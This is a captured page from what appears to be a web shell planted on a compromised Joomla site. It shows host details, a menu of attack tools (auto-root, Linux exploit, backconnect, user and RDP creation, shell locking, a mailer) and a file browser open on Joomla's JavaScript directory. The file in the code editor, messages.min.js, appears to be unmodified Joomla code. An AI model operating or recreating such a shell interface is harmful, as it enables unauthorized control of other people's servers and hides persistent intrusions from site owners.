Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
system /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
fields
[ DIR ]
drwxr-xr-x
core-es5.js
25.55
KB
-rw----r--
core-es5.min.js
6.93
KB
-rw----r--
core-es5.min.js.gz
2.89
KB
-rw----r--
core.js
24.17
KB
-rw----r--
core.min.js
7.16
KB
-rw----r--
core.min.js.gz
2.96
KB
-rw----r--
draggable-es5.js
5.98
KB
-rw----r--
draggable-es5.min.js
2.07
KB
-rw----r--
draggable-es5.min.js.gz
878
B
-rw----r--
draggable.js
5.54
KB
-rw----r--
draggable.min.js
2.32
KB
-rw----r--
draggable.min.js.gz
908
B
-rw----r--
highlight-es5.js
69.69
KB
-rw----r--
highlight-es5.min.js
15.6
KB
-rw----r--
highlight-es5.min.js.gz
5.48
KB
-rw----r--
highlight.js
61.41
KB
-rw----r--
highlight.min.js
14.13
KB
-rw----r--
highlight.min.js.gz
5.23
KB
-rw----r--
joomla-core-loader-es5.js
8.27
KB
-rw----r--
joomla-core-loader-es5.min.js
5.35
KB
-rw----r--
joomla-core-loader-es5.min.js....
1.86
KB
-rw----r--
joomla-core-loader.js
4.31
KB
-rw----r--
joomla-core-loader.min.js
3.66
KB
-rw----r--
joomla-core-loader.min.js.gz
1.14
KB
-rw----r--
joomla-hidden-mail-es5.js
5.3
KB
-rw----r--
joomla-hidden-mail-es5.min.js
2.65
KB
-rw----r--
joomla-hidden-mail-es5.min.js....
1.1
KB
-rw----r--
joomla-hidden-mail.js
2.14
KB
-rw----r--
joomla-hidden-mail.min.js
1.32
KB
-rw----r--
joomla-hidden-mail.min.js.gz
595
B
-rw----r--
joomla-toolbar-button-es5.js
7.28
KB
-rw----r--
joomla-toolbar-button-es5.min....
3.46
KB
-rw----r--
joomla-toolbar-button-es5.min....
1.34
KB
-rw----r--
joomla-toolbar-button.js
3.07
KB
-rw----r--
joomla-toolbar-button.min.js
1.69
KB
-rw----r--
joomla-toolbar-button.min.js.g...
662
B
-rw----r--
keepalive-es5.js
1.53
KB
-rw----r--
keepalive-es5.min.js
599
B
-rw----r--
keepalive-es5.min.js.gz
382
B
-rw----r--
keepalive.js
1.4
KB
-rw----r--
keepalive.min.js
564
B
-rw----r--
keepalive.min.js.gz
366
B
-rw----r--
messages-es5.js
16.8
KB
-rw----r--
messages-es5.min.js
7.89
KB
-rw----r--
messages-es5.min.js.gz
2.69
KB
-rw----r--
messages.js
10.29
KB
-rw----r--
messages.min.js
5.29
KB
-rw----r--
messages.min.js.gz
1.66
KB
-rw----r--
multiselect-es5.js
4.5
KB
-rw----r--
multiselect-es5.min.js
2.08
KB
-rw----r--
multiselect-es5.min.js.gz
711
B
-rw----r--
multiselect.js
3.91
KB
-rw----r--
multiselect.min.js
1.95
KB
-rw----r--
multiselect.min.js.gz
674
B
-rw----r--
searchtools-es5.js
19.27
KB
-rw----r--
searchtools-es5.min.js
10.08
KB
-rw----r--
searchtools-es5.min.js.gz
2.45
KB
-rw----r--
searchtools.js
17.46
KB
-rw----r--
searchtools.min.js
9.75
KB
-rw----r--
searchtools.min.js.gz
2.41
KB
-rw----r--
showon-es5.js
9.43
KB
-rw----r--
showon-es5.min.js
2.95
KB
-rw----r--
showon-es5.min.js.gz
1.02
KB
-rw----r--
showon.js
8.6
KB
-rw----r--
showon.min.js
2.79
KB
-rw----r--
showon.min.js.gz
1006
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : messages.min.js
class AlertElement extends HTMLElement{constructor(){super(),this.close=this.close.bind(this),this.destroyCloseButton=this.destroyCloseButton.bind(this),this.createCloseButton=this.createCloseButton.bind(this),this.onMutation=this.onMutation.bind(this),this.observer=new MutationObserver(this.onMutation),this.observer.observe(this,{attributes:!1,childList:!0,subtree:!0}),this.addEventListener("animationend",(t=>{"joomla-alert-fade-in"===t.animationName&&t.target===this&&(this.dispatchEvent(new CustomEvent("joomla.alert.shown")),this.style.removeProperty("animationName"))})),this.addEventListener("animationend",(t=>{"joomla-alert-fade-out"===t.animationName&&t.target===this&&(this.dispatchEvent(new CustomEvent("joomla.alert.closed")),this.remove())}))}static get observedAttributes(){return["type","role","dismiss","auto-dismiss","close-text"]}get type(){return this.getAttribute("type")}set type(t){this.setAttribute("type",t)}get role(){return this.getAttribute("role")}set role(t){this.setAttribute("role",t)}get closeText(){return this.getAttribute("close-text")}set closeText(t){this.setAttribute("close-text",t)}get dismiss(){return this.getAttribute("dismiss")}set dismiss(t){this.setAttribute("dismiss",t)}get autodismiss(){return this.getAttribute("auto-dismiss")}set autodismiss(t){this.setAttribute("auto-dismiss",t)}connectedCallback(){this.dispatchEvent(new CustomEvent("joomla.alert.show")),this.style.animationName="joomla-alert-fade-in",this.type&&["info","warning","danger","success"].includes(this.type)||this.setAttribute("type","info"),this.role&&["alert","alertdialog"].includes(this.role)||this.setAttribute("role","alert"),this.firstElementChild&&"BUTTON"===this.firstElementChild.tagName&&(this.button=this.firstElementChild,this.button.classList.contains("joomla-alert--close")&&this.button.classList.add("joomla-alert--close"),""===this.button.innerHTML&&(this.button.innerHTML='<span aria-hidden="true">×</span>'),this.button.hasAttribute("aria-label")||this.button.setAttribute("aria-label",this.closeText)),this.hasAttribute("dismiss")&&!this.button&&this.createCloseButton(),this.hasAttribute("auto-dismiss")&&this.autoDismiss()}disconnectedCallback(){this.button&&this.button.removeEventListener("click",this.close),this.observer.disconnect()}attributeChangedCallback(t,e,s){switch(t){case"type":(!s||s&&-1===["info","warning","danger","success"].indexOf(s))&&(this.type="info");break;case"role":(!s||s&&-1===["alert","alertdialog"].indexOf(s))&&(this.role="alert");break;case"dismiss":s&&""!==s||e&&""!==e?this.button&&"false"===s?this.destroyCloseButton():this.button||"false"===s||this.createCloseButton():this.button&&!this.hasAttribute("dismiss")?this.destroyCloseButton():!this.button&&this.hasAttribute("dismiss")&&this.createCloseButton();break;case"close-text":s&&s===e||this.button&&this.button.setAttribute("aria-label",s);break;case"auto-dismiss":this.autoDismiss()}}onMutation(t){for(const e of t)"childList"===e.type&&e.addedNodes.length&&this.button&&this.firstElementChild!==this.button&&this.prepend(this.button)}close(){this.dispatchEvent(new CustomEvent("joomla.alert.close")),this.style.animationName="joomla-alert-fade-out"}createCloseButton(){this.button=document.createElement("button"),this.button.setAttribute("type","button"),this.button.classList.add("joomla-alert--close"),this.button.innerHTML='<span aria-hidden="true">×</span>',this.button.setAttribute("aria-label",this.closeText),this.insertAdjacentElement("afterbegin",this.button),this.button.addEventListener("click",this.close)}destroyCloseButton(){this.button&&(this.button.removeEventListener("click",this.close),this.button.parentNode.removeChild(this.button),this.button=null)}autoDismiss(){const t=parseInt(this.getAttribute("auto-dismiss"),10);setTimeout(this.close,t>=10?t:3e3)}}customElements.get("joomla-alert")||customElements.define("joomla-alert",AlertElement);const getMessageContainer=t=>{let e;return t instanceof HTMLElement?t:(e=void 0===t||t&&"#system-message-container"===t?document.getElementById("system-message-container"):document.querySelector(t),e)};Joomla.renderMessages=(t,e,s,i)=>{const o=getMessageContainer(e);(void 0===s||s&&!1===s)&&Joomla.removeMessages(o),[].slice.call(Object.keys(t)).forEach((e=>{let s=e;const n=t[e],a=document.createElement("joomla-alert");["success","info","danger","warning"].indexOf(e)<0&&(s="notice"===e?"info":e,s="message"===e?"success":s,s="error"===e?"danger":s,s="warning"===e?"warning":s),a.setAttribute("type",s),a.setAttribute("close-text",Joomla.Text._("JCLOSE")),a.setAttribute("dismiss",!0),i&&parseInt(i,10)>0&&a.setAttribute("auto-dismiss",i);if(void 0!==Joomla.Text._(e)){const t=document.createElement("div");t.className="alert-heading",t.innerHTML=Joomla.sanitizeHtml(`<span class="${e}"></span><span class="visually-hidden">${Joomla.Text._(e)?Joomla.Text._(e):e}</span>`),a.appendChild(t)}const r=document.createElement("div");r.className="alert-wrapper",n.forEach((t=>{r.innerHTML+=Joomla.sanitizeHtml(`<div class="alert-message">${t}</div>`)})),a.appendChild(r),o.appendChild(a)}))},Joomla.removeMessages=t=>{const e=getMessageContainer(t),s=[].slice.call(e.querySelectorAll("joomla-alert"));s.length&&s.forEach((t=>{t.close()}))},document.addEventListener("DOMContentLoaded",(()=>{const t=Joomla.getOptions("joomla.messages");t&&Object.keys(t).map((e=>Joomla.renderMessages(t[e],void 0,!0,void 0)))}));
Close